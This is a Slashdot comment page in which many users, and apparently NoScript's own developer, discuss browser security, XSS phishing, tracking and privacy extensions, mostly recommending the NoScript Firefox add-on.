Slashdot Mirror

http://noscript.net/

Very well said!

XSS-based phishing like reported in this other PERFECT PHISHING comment can evade any current antiphishing tool.

Pasting the link and/or looking at the host won't help either, as the landing site is the original, legit one. You would need to be a programmer analyzing the whole URL very deeply, even if that example has not been obfuscated for educational purpose, I guess.

It's detected and blocked by the NoScript Firefox extension, provided that it's opened from email or from an untrusted site, but that's another story (or just the same?)

The scary part is that if you've got automatic completion enabled for the login form, you don't even need to type anything, and your account is already stolen...

JavaScript is dangerous, and incompetent developers make it worse :(

Toby, care to tell me where you got this info about leaks?

A "leak on window closure" regression appeared in NoScript 1.1.4.6.070322 (an "unofficial" development build) and was fixed 3 days later.

Since then I keep Leak Monitor in my development profile, even if it's a pain because of Firebug's and Venkman's leaks... ;)

Later NoScript versions are completely leak-free (see the changelog).

Reuters uses javascript to refresh and refresh blocker only nukes the META tag type of refreshing. The combination of refresh blocker and noscript does the trick here.

I've said it before, I'll say it again: we went through the same thing with Windows 95+ and Outlook.

Masses: "Ooooo look at the shiny features!"
tiny voice in the distance: "But it's a security nightmare!"
Masses (louder): "Ooooo look at the shiny features!"

I don't think any of these technologies are inherently any worse than any other method, but the problem is that they don't understand the technologies well enough, and aren't testing for vulnerabilities.

Unfortunately They are only part of the problem. It is currently impossible to secure Javascript for reasons that exist well beyond the individual web site.

• Security is Broken
• Web 2.0 Under Seige
• Javascript Malware

The great hazard of client side scripting support (Javascript, Flash, Java, et. al.) is that a breach of the sandbox in one domain can potentially hazard your interactions in other domains. So even if your site is 100% secured Javascript ensures your users can still be at risk. The only solution right now is for 100% of websites to be 100% invulnerable. Is that likely?

Personally I use Firefox with NoScript but while there may be instances where I can be reasonably sure a site I am visiting is not going to intentionally compromise me, there is no way to know that any site is 100% XSS proof. I know full well that every time I enable a site to use Javascript or Flash I increase my risk.

Make no mistake, there is a point at which things boil down to features vs. security. We all have a different threshold at which we are comfortable with the compromise.

Normally, when a viewer hovers over a hyperlink, the name of the site that the computer user is about to access appears in the bottom left corner of the browser window. But hovering over Google's sponsored links shows nothing in that area. That blank space potentially gives bad guys another way to hide where visitors will be taken first.

Google is doing something bad here - disabling a browser security feature with JavaScript (why? - that was fashionable a decade ago...). Firefox users can install NoScript to prevent this kind of chicanery. I'm surprised Firefox doesn't have a preference to disable allowing JavaScript to do this in the first place.

(yes, that was a taunt for somebody to post the little-known about:config preference to disable this mis-feature)

It seems I can.

99% of ads are javascript-based. You can always turn it on for trusted domains where you get some ajax-y benefit.

It was a glitch in dynamic inclusion of external scripts through the document.write("<script...></script>") hack used by some AJAX libraries (e.g. Scriptacolous on Digg). This was an rare problem under normal conditions, but NoScript filters used to make it appear more frequently.

Good news is that current NoScript 1.1.4.7 Release Candidate fixes this issue once (hopefully) for ever.

Fortunately the web development community has learned so much from the ongoing ramifications of Microsoft's "features first, security later" approach in the 90's that we would never recreate such a mess. Oh wait - automatic, default execution of third party code on the client browser, INSIDE THE FIREWALL? What could possibly go wrong with that?

The arguments today also mirror what went on with Windows and Outlook in the 90's. A few wild haired prophets screaming doom and gloom but 99.9% of the IT community was/is hypnotized by the glamour of "features, features, features" and security is relegated to patching. Like building a submarine out of swiss cheese. You'll spend the rest of your life patching but if everyone does it, it's normal. A few weirdos will look up and say "why don't we just start with a less porous base material?" but they will be shouted down by the masses.

Javascript, Flash and Applets are insecure by concept. Oh, pardon me, sandboxes will take care of everything? Append an image to the DOM from your server. If that "image" is actually a program which reads the query string you can pass it any information you want. Sandbox jumped. Not a bug, a feature.

It's not enough to patch websites. It only takes one popular compromised site to infect thousands or even millions of users. Do I trust every site on the internet to be 100% invulnerable 24/7? Not really. Not even the sites I work on.

Most BANKS and financial services require Javascript to log in. Nice to know such critical web services are designed by people who "care about customer security." (cough, cough)

NoScript seems to be a reasonable compromise. No browser I'm aware of takes this approach by default.

In TFA it says, "BrowserSpy delves even deeper into your system and even reports on whether you have certain software on your system, such as RealPlayer and Adobe Acrobat, including version information." Yet when I followed the link to this BrowserSpy thing, I found that much of the information it attempted to gather didn't work. It's all based on Javascript. While turning Javascript on and off all the time is a huge hassle, the NoScript extension for FireFox makes it much, MUCH easier. Since it also works based on the source of the Javascript, not the source of the web page you're viewing, sites which display web pages pulling data from elsewhere (e.g., a web store that pulls in Javascript code from a DoubleClick server) can still work, even if the undesired code is still disabled.

I had an argument with a friend of mine about this. He claimed "the web is Javascript." I disagree; most things seem to work just fine with Javascript selectively enabled instead of universally enabled. A few broken web sites is a low enough cost for the increased safety margin.

Yes, the codebase for Seamonkey will be slightly behind that for Firefox. I see that as a good thing, as it weeds out most of the x.0 type bugs, and makes Seamonkey a more mature product.

Obviously enough, NoScript users were immune from all these vulnerabilities, and from most of the yet to be discovered ones too :P

Yes, peer review applies to the trunk as well.

The main difference is that new features and "risky" fixes (i.e. large patches with high regression danger) are almost never accepted in a branch, unless they answer an urgent security need.

Trunk, instead, is considered a playground for innovation, but changes are nevertheless bound to the same proposal/discussion/review/commit life cycle.

--
There's a browser safer than Firefox, it is Firefox, with NoScript.

Still accepting candy from the strangers?

Default permit is the dumbest idea in security (well, default passwords can't even qualify as "ideas" ;) )

--
There's a browser safer than Firefox, it is Firefox, with NoScript.

Still accepting candy from the strangers?

Default permit is the dumbest idea in security (well, default passwords can't even qualify as "ideas" ;) )

--
There's a browser safer than Firefox, it is Firefox, with NoScript.

More people need to stop running fascist websites that require javascript be on for simple text content...

How the USA is becoming a police state
Hey, turn on Javascript!
Yes, you!
Turn it on!

Ahh - noscript.

We are pleased with the verdict and will continue to pursue criminal action against people who try to harm our members in any way.

I'd suggest No-Script http://noscript.net/ Its a Firefox Extension and as the name suggests, no scripts run unless you give the say so :)

I'll tolerate ads. They pay the bills, and I appreciate having the content available without having to pay an additional fee. The ads on /. aren't bad, for example. But what drives me nuts are the Javascript ones with windows that float, move, or otherwise obscure the content beneath them. That's going too far. For those ones, I turn off Javascript (either manually or with Noscript) and reload the page. That kills them or forces the site to use a more reasonable advertising method.

I'm sorry, if advertisers are going to do the equivalent of waving a placard right in front of my face, then, yes, I'm going to tear it out of their hands and crush it.

I tried the proof of concept with Firefox 2 and it FAILED for me. How? I use the NoScript extension. NoScript for the win once again, in case anyone still doubted its claim: There's a browser safer than Firefox... it is Firefox, with NoScript!

It requires javascript so it gets a thumbsdown from me. I have NoScript installed so when I would search for something I got the home page over and over. No search results. No thanks.

... it is Firefox with NoScript :)

I wrote this Firefox add-on just after one of these disclosures, because the majority of the browser vulnerabilities was JavaScript related, and the suggested work-around was always "turn off JavaScript".

Disabling JavaScript as a whole seemed quite an impractical advice to me in this AJAXified Web 2.0: I thought that maintaining a white-list of trusted sites allowed to run JavaScript and keeping all the unknown web content "static" until I decided otherwise was a still safe but more convenient approach.

Since then I've been browsing the web with my shields up (NoScript can block also Java, Flash and other plugins), but I allow on the fly with one click, either temporarily or permanently, those sites which I trust and which do need dynamic client side technologies to work properly. To my surprise in 1 year and half I found few sites belonging to this category, because most places I usually browse are well designed enough to work with plain XHTML/CSS and nothing else (like Slashdot itself).

Notice: Firefox is a very safe browser because its vulnerabilities gets patched very quickly, once they're found by developers. I'm a Firefox contributor myself, and I'm very proud of the quality of the Mozilla developers community. NoScript, though, provides some extra protection even against those JavaScript/Java related vulnerabilities which have not been found yet...

... it is Firefox with NoScript :)

I wrote this Firefox add-on just after one of these disclosures, because the majority of the browser vulnerabilities was JavaScript related, and the suggested work-around was always "turn off JavaScript".

Disabling JavaScript as a whole seemed quite an impractical advice to me in this AJAXified Web 2.0: I thought that maintaining a white-list of trusted sites allowed to run JavaScript and keeping all the unknown web content "static" until I decided otherwise was a still safe but more convenient approach.

Since then I've been browsing the web with my shields up (NoScript can block also Java, Flash and other plugins), but I allow on the fly with one click, either temporarily or permanently, those sites which I trust and which do need dynamic client side technologies to work properly. To my surprise in 1 year and half I found few sites belonging to this category, because most places I usually browse are well designed enough to work with plain XHTML/CSS and nothing else (like Slashdot itself).

Notice: Firefox is a very safe browser because its vulnerabilities gets patched very quickly, once they're found by developers. I'm a Firefox contributor myself, and I'm very proud of the quality of the Mozilla developers community. NoScript, though, provides some extra protection even against those JavaScript/Java related vulnerabilities which have not been found yet...

... it is Firefox with NoScript :)

I wrote this Firefox add-on just after one of these disclosures, because the majority of the browser vulnerabilities was JavaScript related, and the suggested work-around was always "turn off JavaScript".

Disabling JavaScript as a whole seemed quite an impractical advice to me in this AJAXified Web 2.0: I thought that maintaining a white-list of trusted sites allowed to run JavaScript and keeping all the unknown web content "static" until I decided otherwise was a still safe but more convenient approach.

Since then I've been browsing the web with my shields up (NoScript can block also Java, Flash and other plugins), but I allow on the fly with one click, either temporarily or permanently, those sites which I trust and which do need dynamic client side technologies to work properly. To my surprise in 1 year and half I found few sites belonging to this category, because most places I usually browse are well designed enough to work with plain XHTML/CSS and nothing else (like Slashdot itself).

Notice: Firefox is a very safe browser because its vulnerabilities gets patched very quickly, once they're found by developers. I'm a Firefox contributor myself, and I'm very proud of the quality of the Mozilla developers community. NoScript, though, provides some extra protection even against those JavaScript/Java related vulnerabilities which have not been found yet...

I find it far more effective to use NoScript. Quoting from their site: While its primary aim is preventing malicious JavaScript from running, NoScript can effectively block Java(TM), Flash® and other plugins on untrusted sites.

However, ignoring all that. Flash 9 .. now I can finally use Digg Swarm/Stack .. yay!

Why not go all the way?

http://www.noscript.net/whats

Yes, it blocks Flash, Java, and other embedded crap as well as disabling Javascript, and has the same "click-to-activate" feature (plus per-site allow and temporary allow options), etc, etc.

Bleh, this sounds like an ad. I have nothing to do with NoScript, I'm just a very happy user...

Anonymousized just in case.

What about NoScript? http://www.noscript.net/whats

OK, so it follows that the fewer places my bank details are, the less likely a direct debit could be set up to hoover my account. So by not using Paypal, by not even having an account (anymore), I cannot be phished, nor can PP be cracked (tech or social) and my details getting out.

Though my bank details may be visible to other ebay users I buy from, and by extension their accounts could be hacked and my details obtained by a crook, but this is pretty unlikely. But by the sounds of it the DD scheme is very protected and thats the only real "attack vector" if you have my sort code, name and a/c number.

But I found a file on my laptop earlier that I used as a notebook whilst I was constructing my rant to put in the box when closing the Paypal account I had (in error...). I feel I need to share this with the world, and you can give Paypal this amount of abuse and they don't do anything! :) This chunk is over 2000 chars, but the 1000 character limit was enforced with javascript IIRC (can I get a shout out to NoScript?).

1000 characters is not enough. Why place a limit? Can't Paypal take criticism? Or more likely those beloved shareholders are more important than your customers?

Paypal are greedy cunts, security is BS, you react in knee-jerk ways to sec issues (as long as paypal isn't ripped off, fraud isn't a problem from your point of view. So what if the customer get ripped off, what are they going to do, find another escrow service they can use on ebay?).

But fat-cat execs can't ever see what is wrong with their greed (and that attitude filters throughout an organisation. Do you have wanker middle-mgmt types that will fuck over the peons for personal gain (like bonuses or cars)?). I bet the person who reads this (first, but I doubt even if this gets escalated no-one will give a shit) is paid an insulting salary and hates their job, or at least the office politics etc..

At least in the UK you are regulated by the FSA, but elsewhere I understand you can do what you like, because your not a bank and are so able to avoid any regulation.

PS It's trivial to by pass restrictions on a website, and only a retard would think that a JS limiter would be worth deploying into the production environment. But let me guess, the accountant types make the decisions, not the people who actually understand tech.

(though if there is half a clue anywhere in your organisation, you'll have post submit checks to force the-limits) (Wow, you do on the 3 tick box rule. I also want to tick:

No longer need / one time use
Bank account verification
PayPal's customer service was unprofessional
Fees are too high
Credit card verification
PayPal's products do not meet my needs)

I have entered the following into the "other" box, but it's over a number of characters so your shitty web site is choking:

Spam. I signed up for policy notifs & transaction emails, but I started getting shit about paypal by text, or someother system that is screaming out as a fraud vector, and you added me to a fucking mailing list without my consent.

And what the fuck? I have said to close this account multiple times, and I am repeatedly asked if I want to do something else. No, fucktards, I don't.

Yeah, it turned into a foaming rant :)

I would assume Noscript, which allows you to block JavaScript except for sites you allow it for. Opera has the same functionality built in.

But NoScript can be configured to block Flash movies as well and behave like FlashBlock (i.e. enabling them on demand with one click): NoScript FAQ 1.3.

Exactly. That's why I use NoScript... and everyone else should too! Get it and you'll eliminate all kinds of attacks.

Saved by NoScript again. If you're not using it, you really should; it can block exploits before anyone knows they exist! (Since they may require JavaScript, and this would block them. My statement is strictly true.)

Yeah, I was gonna say noscript: http://www.noscript.net/whats

So what if Doubleclick (may they burn in Hell forever) knows that some guy visits Slashdot, ThinkGeek, and PennyArcade? I figure my privacy is fine as long as they cannot link the activity back to me personally.

The ignorance in this statement is so staggering that I had to respond and lose the moderations I've made on other posts to this story.

If you have any account online for which you have ever disclosed your true identity (like in order to make a purchase) then that account information can and will be cross-referenced with all of the tracking data that the tracking companies have been able to put together on you. They are expectionally good at finding those information leaks and putting 1 and 1 and 1 and 1 together to make 4.

Don't be lulled into a false sense of security even if you are the type to disable cookies. Cookies are not the only way Doubleclick and the like track people. Embedded images, tags, 3rd party style sheets with god knows what javascript, ip address correlation, etc. The bag of tricks is practically bottomless.

I religiously use the following extensions to Firefox, with almost every site fully locked out, and even then I still leak personal information like a seive:

NoScript
CookieSafe
AdBlock Plus

Adsense what's that?

Ah, but you can:

        http://www.noscript.net/whats

Well... Where's the source code for that? I looked over the site pretty closely and couldn't find any links to the source. Maybe it is in the xpi but I shouldn't have to dig for it there. Also, the uninstall information was extremely lame and basically punted you elsewhere.

Ah, but you can:

    http://www.noscript.net/whats

Completely blocked the "proof of concept" script here.

For about a year now I routinely install a whitelisting firefox extension called NoScript
It blocks javascript per-site until I choose to whitelist the site: Not only do I get a great deal fewer annoyances interrupting my browsing, but it also cuts out a lot of web advertising (the AdBlock extension makes my browser drag when fully loaded with filters)

The NoScript extension covers this for JavaScript (and Java, Flash, more) at least.

For JavaScript, use NoScript: http://www.noscript.net/whats

If you use the NoScript extension (http://noscript.net/) and block googlesyndication.com, those tracking scripts can't execute.

Two words for you.. NoScript Extension.

The FF extensions I use are:

• NoScript (http://www.noscript.net/). I allow very few sites to run scripts, and the vast majority of sites work fine without JS. Even if JS is needed, it is easily enabled for good with noscript, or just for that browser session (and I use this feature more). Like flash and animated gifs, JS has been hijacked by marketters as a method to peddle their wares and they have spoilt it for everyone else. A fantastic side effect of running without JS is many sites use JS almost as a crude DRM.... There's some sites about that make you click an "I agree" button to download stuff, and often the EULA is in an HTML form textbox. The more stupid web devs protect the text of the EULA with JS to stop it being changed, even though text in boxes can be "readonly" just with HTML from 10 years ago.... then you agree to your new contract :)
• RefControl (http://www.stardrifter.org/refcontrol/). A referer blocker. I block all referers as it's simply a way to provide less info to a website. A website doesn't need to know where I have come from, and what will they do with that knowledge if they have it? Probably nothing that can harm me, but it could be useful for targetted adverts. Very few sites need referers to work, and they are mostly pr0n and warez/crack sites that use referers to stop leaching. That reminds me, must whitelist fosi again :)
• Adblock. (http://adblock.mozdev.org/). Everyone will be familiar with this. I use filterset.g too, and also add agressive filters for sites that are blatently tracking/trending domains. For example, one filter I have is http*.google-analytics.com/* . I have seen one tracking domain serving web bugs (those 1x1 images) by https, so my filters these days allow for that too...
• Extended Cookie Manager. (http://xcm.defector.de/). I basically accept all cookies on a session basis, and then whitelist the sites that need permament cookies, or at least the sites I use that I trust not to track me (more than is necessary for the operation of the website), or that I don't want to have to log into every time.

  If anyone can answer this I'd be chuffed though: Can FF be made to automatically try to use HTTPS for all surfing? For example, you type in a URL and it'll try the HTTPS site, you click on a link on a website and the browser will go to the https if it exists?.

  As I said above I'm going to be setting up a tor node too on a spare machine, and will use this for searches and any communication with governmental sites, and sites where I may disclose personal info.

  I can, if I want to, renew my car tax online for example. The UK government has demonstrated it's obsession with data collection with the the ID cards etc., and sooner or later they will realise really how powerful datamining is. I don't feel they need to ever be given my name/address and IP. If they ever want to determine users from IPs (eg IndyMedia servers) they can get a fucking court order and get the ISP to hand over the info. Even that's horrific, but there's not much I can directly do about that, apart from a Tor node. An extension for FF to automatically use a proxy for certain domains would be cool.

  Of course common sense too protects your privacy. Always use fake details if registering for somewhere that doesn't need your details, and never use the same fake person at a bunch of sites, or even all the time. Make up names on the spot, or just munge keys. Some sites want valid info, or even check postal codes exist... We all know about 90210 for America, and the British postal code system can be abused too. I tend to use B1 1AA when a site wants a post code, or I'll go to their contact pages and find one there. Some sites are smart enough to not let

you want NoScript... NOT adblock. NoScript blocks all Javascript crap by default and you can selectively temporarily-enable or whitelist stuff that you need.

You can use NoScript. It automatically blocks all scripts, you can then whitelist (temporarily or forever) scripts on each website by the originating domain with a simple click. Also, it can prevent embedded WMP media from loading (for some people, disabled javascript + embedded WMV = crash).

http://www.noscript.net/whats

You want noscript. It's an addon. I'm using it under Seamonkey.

http://www.noscript.net/

You could use noscript. http://www.noscript.net/whats/ It autoblocks ALL javascript then you opt in for one time or forever for each site.

And AdZap for squid was doing it before that. With roaming laptops and such, I found it easier to just install AdBlock which was much more effective.

With anti-adblocking code out there (along with javascript malware,) NoScript for FF is also a must. User Agent Switcher is also cool - make your browser look like a search engine such as googlebot... Can lead to interesting results on some sites.